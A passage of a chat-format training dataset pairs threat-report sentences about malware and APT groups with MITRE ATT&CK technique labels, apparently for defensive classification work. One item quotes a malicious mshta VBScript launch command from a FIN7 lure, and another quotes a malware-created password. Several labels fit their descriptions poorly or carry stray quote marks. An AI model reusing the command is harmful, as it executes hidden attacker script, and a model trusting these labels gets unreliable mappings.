- "content": "This variant uses an 8-byte XOR key to obfuscate API names and other strings within the payload (Figure 5). Figure 5: 8-Byte XOR Key for obfuscation"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In one instance, the threat actor gained remote access to a high-value system in a compromised network, ran quser.exe to identify existing RDP sessions on the device, immediately ran a command to compile a RAR archive that specified file types the threat actor did not want, and used a password to encrypt the archive"
- },
- {
- "role": "assistant",
- "content": "T1119 - Automated Collection', 'T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Netwalker has been written in PowerShell and executed directly in memory, avoiding detection."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Observed GoldMax C2 domains are high-reputation and high-prevalence, often acquired from domain resellers so that Whois records retain the creation date from their previous registration, or domains that may have been compromised. This tactic complements NOBELIUM’s operational security strategy as these domains are more likely to be overlooked by security products and analysts based on their perceived long-lived domain ownership. Put simply, several domains we have shared as GoldMax C2 domains are only associated with NOBELIUM after the time they were re-sold or compromised – and Microsoft has provided that indicator context where it is available to us"
- },
- {
- "role": "assistant",
- "content": "T1584.001 - Domains"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ke3chang has used tools to download files to compromised machines."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Turla has used a custom decryption routine, which pulls key and salt values from other artifacts such as a WMI filter or PowerShell Profile, to decode encrypted PowerShell payloads."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LoudMiner used a script to gather the IP address of the infected machine before sending to the C2."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Naikon has used a netbios scanner for remote machine identification."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Based on the McAfee Advanced Threat Research team’s analysis, we find multiple components from this operation are unique from a code perspective, even though the code is loosely based on previous versions of the SYSCON backdoor"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information', 'T1027.001 - Obfuscated Files or Information: Binary Padding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ObliqueRAT has gained execution on targeted systems through luring users to click on links to malicious URLs."
- },
- {
- "role": "assistant",
- "content": "T1204.001 - Malicious Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OnionDuke has the capability to use a Denial of Service module."
- },
- {
- "role": "assistant",
- "content": "T1499 - Endpoint Denial of Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Magic Hound gathered credentials from two victims that they then attempted to validate across 75 different websites."
- },
- {
- "role": "assistant",
- "content": "T1589.001 - Credentials"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NetPass.exe: a legitimate utility developed by NirSoft that recovers all network passwords stored on a system for the current logged-on user. This tool can also recover passwords stored in the credentials file of external drives. WebBrowserPassView: a password recovery tool that captures passwords stored by Internet Explorer, Mozilla Firefox, Google Chrome, Safari, and Opera and passes them to the credential enumerator module. Mail PassView: a password recovery tool that reveals passwords and account details for various email clients such as Microsoft Outlook, Windows Mail, Mozilla Thunderbird, Hotmail, Yahoo. Mail, and Gmail and passes them to the credential enumerator module. Once an available system is found, Emotet then writes the service component on the system, which writes Emotet onto the disk"
- },
- {
- "role": "assistant",
- "content": "T1552.001 - Unsecured Credentials: Credentials In Files"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ZxShell has used HTTP for C2 connections."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BackdoorDiplomacy has exploited CVE-2020-5902, an F5 BIP-IP vulnerability, to drop a Linux backdoor. BackdoorDiplomacy has also exploited mis-configured Plesk servers."
- },
- {
- "role": "assistant",
- "content": "T1190 - Exploit Public-Facing Application"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Firstly, the reason this has been named MirageFox instead of just Mirage, is because in the Export directory for the modules, the name field is filled with a string MirageFox_Server.dat"
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SombRAT has the ability to run \"cancel\" or \"closeanddeletestorage\" to remove all files from storage and delete the storage temp file on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sodinokibi ransomware, also known as REvil or Sodin, has been responsible for a series of high-profile attacks since April 2019"
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN7 sent spearphishing emails with either malicious Microsoft Documents or RTF files attached."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can gather victim proxy information."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "1) Communicate with the C2, try to forward ports with UPnP and determine available ports and report them to the C2. The usual C2 communication protocol used here is HTTP POST RC4-ciphered JSON data. Instead of saving the downloaded file, QakBot measures the download speed and deletes the received file. 3) Set up external PROXY-C2 connection that was received with command 37 (update config)/module 274 (proxy) by the stager"
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HAWKBALL is a backdoor that communicates to a single hard-coded C2 server using HTTP. The C2 server is obtained from the decrypted config file, as shown in Figure 5"
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Once in the folder, this property list (plist) file will launch the CrashReporter program with the Maintain parameter on system load as Root for every user. Because the LaunchDaemon will not run automatically after the plist file is moved, the postinstall script launches CrashReporter with the Maintain parameter and runs it in the background (Create or Modify System Process: Launch Daemon [T1543.004"
- },
- {
- "role": "assistant",
- "content": "T1569.001 - System Services: Launchctl"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "used a rootkit to modify typical server functionality."
- },
- {
- "role": "assistant",
- "content": "T1014 - Rootkit"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For example, we analyzed a DropIt sample (SHA256: cca268c13885ad5751eb70371bbc9ce8c8795654fedb90d9e3886cbcfe323671) that dropped two executables, one of which was saved to “%TEMP%\\flash_update.exe” that was a legitimate Flash Player installer"
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chinese state-sponsored cyber actors have been observed using the New-MailboxExportRequest PowerShell cmdlet to export target email boxes."
- },
- {
- "role": "assistant",
- "content": "T1114 - Email Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TEMP.Veles has obtained and used tools such as Mimikatz and PsExec."
- },
- {
- "role": "assistant",
- "content": "T1588.002 - Tool"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Crimson can identify the user on a targeted system."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "copies an executable payload to the target system by using and then scheduling an unnamed task to execute the malware."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attackers orchestrate attacks using batch or PowerShell scripts that are executed, with the help of domain controllers, on any machine the DC can reach. The scripts retrieve the attackers’ payloads using psexec or certutil"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer', 'T1569.002 - System Services: Service Execution', 'T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The majority of 2017 and 2018 Karagany samples analyzed by CTU researchers were packed using a custom packer, albeit a reasonably simple one that performs a number of binary shifts and logic operations. Karagany campaigns in 2016 and prior typically used the UPX packer as an additional layer of obfuscation, but this behavior was not observed in 2017-2018 samples. Breaking on this function call in a debugger allows an analyst to dump the process and extract the unpacked Karagany binary for further analysis"
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The threat actors can execute remote commands by running this specialized module with predefined actions. This module attempts to execute a command. It uses the PowerShell Invoke-Expression method for the PowerShell-based module, while its C# implementation has both cmd and PowerShell options"
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Magic Hound has exported emails from compromised Exchange servers."
- },
- {
- "role": "assistant",
- "content": "T1114.002 - Email Collection: Remote Email Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Sharpshooter, a first-stage downloader installed Rising Sun to `%Startup%\\mssync.exe` on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chaos conducts brute force attacks against SSH services to gain initial access."
- },
- {
- "role": "assistant",
- "content": "T1110 - Brute Force"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is used to patch an enterprise domain controller authentication process with a backdoor password. It allows adversaries to bypass the standard authentication system to use a defined password for all accounts authenticating to that domain controller."
- },
- {
- "role": "assistant",
- "content": "T1098 - Account Manipulation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NanoCore has the capability to download and activate additional modules for execution."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Earth Lusca used the command \"ipconfig\" to obtain information about network configurations."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After the execution of rundll32.exe, the PowerShell script enu.ps1 is executed. This script is encoded with Base64 in order to avoid detection by antivirus products"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Stolen digital certificate re-use"
- },
- {
- "role": "assistant",
- "content": "T1588.004 - Digital Certificates"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BlackEnergy has removed the watermark associated with enabling the \"TESTSIGNING\" boot configuration option by removing the relevant strings in the \"user32.dll.mui\" of the system."
- },
- {
- "role": "assistant",
- "content": "T1070 - Indicator Removal on Host"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT1 has sent spearphishing emails containing malicious attachments."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RARM Creates RAR files per logical drive containing data with timestamps for the past 30 days, then uploads RAR to the C2 server using a POST command at the path “/FeedBack.php”"
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Figure 1: Malicious FIN7 lure asking victim to double click to unlock contents The malicious LNK launches “mshta.exe” with the following arguments passed to it: vbscript:Execute(\"On Error Resume Next:set w=GetObject(,\"\"Word.Application\"\"):execute w.ActiveDocument.Shapes(2).TextFrame.TextRange.Text:close\") The script in the argument combines all the textbox contents in the document and executes them, as seen in Figure 2"
- },
- {
- "role": "assistant",
- "content": "T1204 - User Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Exaramel for Windows adds the configuration to the Registry in XML format."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT19 leveraged Rich Text Format (RTF) and macro-enabled Microsoft Excel (XLSM) files to deliver their initial exploits"
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The macro uses PowerShell to download a shellcode-based payload from a remote server using one of two available techniques"
- },
- {
- "role": "assistant",
- "content": "T1546.013 - Event Triggered Execution: PowerShell Profile', 'T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can enumerate local information for Linux hosts and find currently logged on users for Windows hosts."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mythic can use SOCKS proxies to tunnel traffic through another protocol."
- },
- {
- "role": "assistant",
- "content": "T1572 - Protocol Tunneling"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Log.php validates the sender by User-Agent, saves the data in the “UP” server directory and stores the metadata in the mssql database for later reference"
- },
- {
- "role": "assistant",
- "content": "T1074 - Data Staged"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "njRAT enumerates the current user during the initial infection."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "gathers information about local groups and members."
- },
- {
- "role": "assistant",
- "content": "T1069 - Permission Groups Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Figure 11 Embedded BMP file containing encrypted string data RC4 is used to decrypt this data using a 16-byte key that is stored within the BMP file at offset 0x502"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "may create a temporary user on the system named “Lost_{Unique Identifier}” with the password “pond~!@6”{Unique Identifier}.”"
- },
- {
- "role": "assistant",
- "content": "T1136 - Create Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Once these variables are set, the malware uses the SoapHttpClientProtocol class to communicate with its C2 server, which issues an HTTP POST requests that appears as: As you can see from the above request, the SoapHttpClientProtocol class neatly structures data into an HTTP POST request"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "contains a copy of the OpenSSL library to encrypt C2 traffic."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RTM uses the command line and rundll32.exe to execute."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "collects the MAC address, computer name, and CPU information."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RTM has the ability to remove Registry entries that it created for persistence."
- },
- {
- "role": "assistant",
- "content": "T1070.009 - Clear Persistence"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gelsemium can compress embedded executables with the zlib library."
- },
- {
- "role": "assistant",
- "content": "T1560.002 - Archive Collected Data: Archive via Library"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KeyBoy uses custom SSL libraries to impersonate SSL in C2 traffic."
- },
- {
- "role": "assistant",
- "content": "T1001.003 - Protocol or Service Impersonation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Modules can be pushed to and executed by that copy data to a staging area, compress it, and XOR encrypt it."
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data', 'T1486 - Data Encrypted for Impact', 'T1074 - Data Staged"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Some Sakula samples install themselves as services for persistence by calling WinExec with the \"net start\" argument."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BackConfig has the ability to use scheduled tasks to repeatedly execute malicious payloads on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware uploads the stolen data to third-party cloud storage providers. The sample identified in the wild is configured to upload to pCloud, but functionality to upload to Dropbox, Box and Yandex Cloud is also included"
- },
- {
- "role": "assistant",
- "content": "T1102.002 - Bidirectional Communication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The function hashing algorithm is used to map a hash value of a given function name to its corresponding location in memory using a process known as Run-Time Dynamic Linking. Pre-computed hashes are passed to the hashing algorithm alongside the Windows library containing the related function name. Each function name within the library is hashed; when a match is found, its address is saved"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The execution chain ensures that persistence is set on the affected system using a .lnk file in the Startup directory. The .lnk file shown in Figure 17 opens the malicious VBS dropped on the system"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After the botnets of direct ZeuS successors were taken down, Dridex’s time came. This malware is a result of Bugat evolution (which appeared in 2010). Bugat v5 was recognized as Dridex in 2014."
- },
- {
- "role": "assistant",
- "content": "T1587.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "allows actors to spawn a reverse shell on a victim."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Similar to its dropper, the binary seeks to evade sandboxes. In addition to the previously described trick EvilBunny performs hook detection to trick environments which hook time retrieval APIs. These are NtQuerySystemTime, GetSystemTimeAsFileTime and GetTickCount. Every API is called twice to calculate a delta, while performing a sleep(1000) operation between iteration one and iteration two. This can only be the case if any of the three API’s return values is modified by a system monitoring solution, like a sandbox"
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SUGARDUMP has stored collected data under `%%\\\\CrashLog.txt`."
- },
- {
- "role": "assistant",
